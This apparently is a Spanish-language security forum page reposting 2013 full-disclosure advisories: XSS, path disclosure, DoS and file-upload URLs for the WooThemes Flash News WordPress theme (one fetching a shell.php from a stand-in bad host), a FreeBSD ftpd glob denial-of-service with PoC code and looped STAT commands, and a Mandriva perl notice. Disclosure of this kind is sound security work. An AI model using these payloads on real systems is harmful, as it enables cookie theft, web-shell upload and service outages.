 I want to warn you about multiple vulnerabilities in Flash News theme for
 WordPress. This is commercial theme for WP from WooThemes.
 
 These are Cross-Site Scripting, Full path disclosure, Abuse of
 Functionality, Denial of Service, Arbitrary File Upload and Information
 Leakage vulnerabilities.
 
 In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of
 Functionality and Denial of Service vulnerabilities in TimThumb and multiple
 themes for WordPress (http://websecurity.com.ua/4910/), and later also was
 disclosed Arbitrary File Uploading vulnerability. After previous advisory,
 I've wrote another one about multiple themes from WooThemes
 (http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site
 Scripting vulnerabilities (only part of their themes were affected).
 
 If two years ago I've wrote about holes in TimThumb and multiples themes
 from WooThemes (where I mentioned Flash News), then this time I wrote
 directly about this particular theme. And also I've added other holes in it.
 
 This is example for Flash News theme. In other themes from WooThemes the
 situation is similar. In above-mentioned advisory I've listed 89 vulnerable
 themes for WP from WooThemes.
 
 -------------------------
 Affected products:
 -------------------------
 
 Vulnerable are all versions of Flash News theme for WordPress (in last
 versions there were fixed only vulnerabilities in thumb.php). I've informed
 developers about these vulnerabilities already in beginning of 2011 (as
 about holes in TimThumb, as about holes in their native scripts in their
 themes - for WordPress and other engines).
 
 After two years since I've informed WooThemes developers, there are hundreds
 thousands of sites with only Flash News theme (not mentioning all other
 themes), according to Google, and all of them are still vulnerable to many
 of these vulnerabilities. Mostly were fixed holes in thumb.php, but not in
 other vulnerable scripts of the theme, and there are many sites which have
 fixed only part of the holes in TimThumb in the theme. E.g. they fixed Code
 Execution (AFU), AoF and DoS holes, but XSS and FPD holes were left.
 
 ----------
 Details:
 ----------
 
 XSS (WASC-08):
 
 http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
 
 Full path disclosure (WASC-13):
 
 http://site/wp-content/themes/flashnews/thumb.php?src=1
 
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
 
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1
 
 Abuse of Functionality (WASC-42):
 
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1
 (bypass of restriction on domain, if such restriction is turned on)
 
 DoS (WASC-10):
 
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
 (bypass of restriction on domain, if such restriction is turned on)
 
 About such Abuse of Functionality and Denial of Service vulnerabilities you
 can read in my article Using of the sites for attacks on other sites
 (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
 
 Arbitrary File Upload (WASC-31) (in not fixed versions of TimThumb):
 
 http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php
 
 Full path disclosure (WASC-13):
 
 http://site/wp-content/themes/flashnews/
 
 Besides index.php there are also potentially FPD in other php-files of this
 theme.
 
 Information Leakage (WASC-13):
 
 http://site/wp-content/themes/flashnews/includes/test.php
 
 Script with phpinfo.
 
 XSS (WASC-08):
 
 http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
 This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where was possible to conduct
 XSS via phpinfo).
 
 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua
 
Fuente: http://seclists.org/fulldisclosure/2013/Feb/8

13
Hace muy poco fué parchada una versión para el servidor ftp de FreBSD 9.1 que permitia a un atacante remoto causar una denegación de servicio con un simple script.

Acá copio y pego la noticia:


FreeBSD 9.1 ftpd Remote Denial of Service
 Maksymilian Arciemowicz
 http://cxsecurity.org/
 http://cxsec.org/
 
 Public Date: 01.02.2013
 URL: http://cxsecurity.com/issue/WLB-2013020003
 
 Affected servers:
 - ftp.uk.freebsd.org,
 - ftp.ua.freebsd.org,
 - ftp5.freebsd.org,
 - ftp5.us.freebsd.org,
 - ftp10.freebsd.org,
 - ftp3.uk.freebsd.org,
 - ftp7.ua.freebsd.org,
 - ftp2.se.freebsd.org,
 - ftp2.za.FreeBSD.org,
 - ftp2.ru.freebsd.org,
 - ftp2.pl.freebsd.org
 and more...
 
 
 --- 1. Description ---
 I have decided check BSD ftpd servers once again for wildcards. Old
 bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
 FreeBSD version.
 Attacker, what may connect anonymously to FTP server, may cause CPU
 resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
 sending 'STAT' command with special wildchar, enought to create ftpd
 process with 100% CPU usage.
 
 Proof of Concept (POC):
 See the difference between NetBSD/libc and FreeBSD/libc.
 --- PoC ---
 
Código: [Seleccionar]
#include <stdio.h>
 #include <glob.h>
 
 int main(){
                 glob_t globbuf;
                 char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
                 glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
 }
--- PoC ---
 
 --- Exploit ---
 user anonymous
 pass anonymous
 
Código: [Seleccionar]
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
 
 Result of attack:
 
Citar
ftp     13034   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.96
 ftpd: cxsec.org anonymous/anonymous (ftpd)
 ftp     13035   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.89
 ftpd: cxsec.org anonymous/anonymous (ftpd)
 ftp     13036   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.73
 ftpd: cxsec.org anonymous/anonymous (ftpd)
 ftp     13046   0.0  0.4  10416   1952  ??  R    10:48PM    0:00.41
 ftpd: cxsec.org anonymous/anonymous (ftpd)
 ftp     13047   0.0  0.4  10416   1960  ??  R    10:48PM    0:00.42
 ftpd: cxsec.org anonymous/anonymous (ftpd)
 ...
 root    13219   0.0  0.3  10032   1424  ??  R    10:52PM    0:00.00
 /usr/libexec/ftpd -dDA
 root    13225   0.0  0.3  10032   1428  ??  R    10:52PM    0:00.00
 /usr/libexec/ftpd -dDA
 root    13409   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
 /usr/libexec/ftpd -dDA
 root    13410   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
 /usr/libexec/ftpd -dDA
 ...
 
 =>Sending:
 STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
 
 =>Result:
 @ps:
 ftp      1336 100.0  0.5  10416   2360  ??  R    11:15PM 600:39.95
 ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
 @top:
 1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd

 
 one request over 600m (~10h) execution time and 100% CPU usage. This
 issue allow to create N ftpd processes with 100% CPU usage.
 
 Just create loop while(1) and send these commands
 ---
 user anonymous
 pass anonymous
 
Código: [Seleccionar]
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
 
 NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
 http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2
 
 The funniest is that freebsd use GLOB_LIMIT in ftpd server.
 http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
 ---
 
Código: [Seleccionar]
        if (strpbrk(whichf, "~{[*?") != NULL) {
                 int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
 
                 memset(&gl, 0, sizeof(gl));
                 gl.gl_matchc = MAXGLOBARGS;
                 flags |= GLOB_LIMIT;
                 freeglob = 1;
                 if (glob(whichf, flags, 0, &gl)) {
---
 
 but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
 resource exhaustion. ;]
 
 Libc was also vulnerable in Apple and Oracle products.
 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
 http://support.apple.com/kb/HT4723
 
 only FreeBSD and GNU glibc are affected
 
 
 --- 2. Exploit ---
 http://cxsecurity.com/issue/WLB-2013010233
 
 
 --- 3. Fix ---
 Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
 problem with security ;)
 
 
 --- 4. References ---
 Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
 http://cxsecurity.com/issue/WLB-2010100135
 http://cxsecurity.com/cveshow/CVE-2010-2632
 
 Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
 http://cxsecurity.com/issue/WLB-2011050004
 http://cxsecurity.com/cveshow/CVE-2011-0418
 
 More CWE-399 resource exhaustion examples:
 http://cxsecurity.com/cwe/CWE-399
 
 The regcomp implementation in the GNU C Library allows attackers to
 cause a denial of service proftpd
 http://cxsecurity.com/cveshow/CVE-2010-4051
 http://cxsecurity.com/cveshow/CVE-2010-4052
 http://www.kb.cert.org/vuls/id/912279
 
 
 --- 5. Contact ---
 Maksymilian Arciemowicz
 max 4T cxsecurity.com
 http://cxsecurity.com/
 http://cxsec.org/

Fuente: http://seclists.org/fulldisclosure/2013/Feb/3
 

14
Volvemos a la edad de piedra. Se ha encontrado un falla de seguridad que permitirñia a un atacante ejecutar código arbitrario con tan solo abrir un documento para Microsoft Word.

Video demostrativo:
Microsoft Office 2003/2007/2010 all service pack Command Execution


El Script con la prueba de concepto se está vendiendo en 1337day:
http://www.1337day.com/exploit/description/20229

Mucho cuidado con aceptar documentos de fuentes que no confien porque pueden venir con sorpresas tales como troyanos, worms, etc.

15
Se ha encontrado una falla de seguridad en Perl Enterprise Server 5.0. Cito desde la fuente original:



_______________________________________________________________________
 
  Mandriva Linux Security Advisory                         MDVSA-2013:005
  http://www.mandriva.com/security/
  _______________________________________________________________________
 
  Package : perl
  Date    : January 28, 2013
  Affected: 2011., Enterprise Server 5.0
  _______________________________________________________________________
 
  Problem Description:
 
  A vulnerability has been found and corrected in perl:
 
  Heap-based buffer overflow in the Perl_repeatcpy function in util.c
  in Perl 5.12.x before 5.12.5, 5.14.x before 5.14.3, and 5.15.x before
  15.15.5 allows context-dependent attackers to cause a denial of service
  (memory consumption and crash) or possibly execute arbitrary code
  via the 'x' string repeat operator (CVE-2012-5195).
 
  The updated packages have been patched to correct this issue.
  _______________________________________________________________________
 
  References:
 
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5195
  _______________________________________________________________________
 
  Updated Packages:
 
  Mandriva Linux 2011:
  2cd2f62ef4fd1fa7d765c5a0fb1292fb  2011/i586/perl-5.12.3-8.2-mdv2011.0.i586.rpm
  a87fedc92aa16e3eb09d3db9c37e1b01  2011/i586/perl-base-5.12.3-8.2-mdv2011.0.i586.rpm
  4dcef0206296645560413e267dd131fe  2011/i586/perl-devel-5.12.3-8.2-mdv2011.0.i586.rpm
  9df0bdda99e7e843943c5e77fba15036  2011/i586/perl-doc-5.12.3-8.2-mdv2011.0.noarch.rpm
  b3daf9e368021a94048bf6f97a129a15  2011/SRPMS/perl-5.12.3-8.2.src.rpm
 
  Mandriva Linux 2011/X86_64:
  3b6ab1c60e98b72d7a2ab4fa1ef8f9eb  2011/x86_64/perl-5.12.3-8.2-mdv2011.0.x86_64.rpm
  38a74f3b9dc65b77c3e2a1ce2b7bf6d5  2011/x86_64/perl-base-5.12.3-8.2-mdv2011.0.x86_64.rpm
  f6e421797d0f1fbf064b59569e06e50a  2011/x86_64/perl-devel-5.12.3-8.2-mdv2011.0.x86_64.rpm
  58844f4e30df7e9962a9eb40ea0fbf29  2011/x86_64/perl-doc-5.12.3-8.2-mdv2011.0.noarch.rpm
  b3daf9e368021a94048bf6f97a129a15  2011/SRPMS/perl-5.12.3-8.2.src.rpm
 
  Mandriva Enterprise Server 5:
  817cd182ec870213e66404c801de1338  mes5/i586/perl-5.10.0-25.5mdvmes5.2.i586.rpm
  19b31597c4116e2dd524ea3b324f58c4  mes5/i586/perl-base-5.10.0-25.5mdvmes5.2.i586.rpm
  ebe2a75601e9fb4ee43ce346abeea2ee  mes5/i586/perl-devel-5.10.0-25.5mdvmes5.2.i586.rpm
  60bc0e4584b2f8ca1b7a9cb1ee6c0d49  mes5/i586/perl-doc-5.10.0-25.5mdvmes5.2.i586.rpm
  bca381efbda683e01a473e4cd04de078  mes5/i586/perl-suid-5.10.0-25.5mdvmes5.2.i586.rpm
  72c15bdff31cc3fc342a0f580fbea56b  mes5/SRPMS/perl-5.10.0-25.5mdvmes5.2.src.rpm
 
  Mandriva Enterprise Server 5/X86_64:
  43baa4703a41bc31774b0c91b97d3021  mes5/x86_64/perl-5.10.0-25.5mdvmes5.2.x86_64.rpm
  44202ed5538712a00e47cea9a045ab3d  mes5/x86_64/perl-base-5.10.0-25.5mdvmes5.2.x86_64.rpm
  e07f48bf12258cf760ef662d8e08d137  mes5/x86_64/perl-devel-5.10.0-25.5mdvmes5.2.x86_64.rpm
  789fc82249d411994197f325086a7279  mes5/x86_64/perl-doc-5.10.0-25.5mdvmes5.2.x86_64.rpm
  5f2c518cc2497ef2ba1799579a99f581  mes5/x86_64/perl-suid-5.10.0-25.5mdvmes5.2.x86_64.rpm
  72c15bdff31cc3fc342a0f580fbea56b  mes5/SRPMS/perl-5.10.0-25.5mdvmes5.2.src.rpm
  _______________________________________________________________________
 
  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
  of md5 checksums and GPG signatures is performed automatically for you.
 
  All packages are signed by Mandriva for security.  You can obtain the
  GPG public key of the Mandriva Security Team by executing:
 
   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
 
  You can view other update advisories for Mandriva Linux at:
 
   http://www.mandriva.com/security/advisories
 
  If you want to report vulnerabilities, please contact
 
   security_(at)_mandriva.com



Fuente: http://seclists.org/fulldisclosure/2013/Jan/250

Páginas: [1] 2 3 ... 9
. . . . . . . .